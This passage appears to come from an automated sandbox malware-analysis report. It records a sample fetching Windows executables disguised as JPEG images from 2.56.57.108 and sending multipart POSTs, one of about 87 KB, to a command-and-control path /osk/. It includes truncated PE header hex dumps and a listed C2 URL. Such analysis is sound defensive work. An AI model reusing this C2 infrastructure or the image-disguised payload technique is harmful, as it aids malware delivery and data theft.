90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT ETag: "6b738-58a9fc4d0ba80" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:30 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:31 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Posts data to a JPG file (protocol mismatch)

Show sources

Source: unknown

HTTP traffic detected: POST /osk//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://2.56.57.108/osk/

Source: Joe Sandbox View

ASN Name: GBTCLOUDUS GBTCLOUDUS

Source: global traffic	HTTP traffic detected: POST /osk//6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk//main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic	HTTP traffic detected: POST /osk/ HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 87324Host: 2.56.57.108Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:27 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:52 GMTETag: "235d0-58a9fc6206c00"Accept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:28 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Sun, 06 Aug 2017 19:52:20 GMTETag: "9d9d8-5561b116cc500"Accept-Ranges: bytesContent-Length: 645592Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 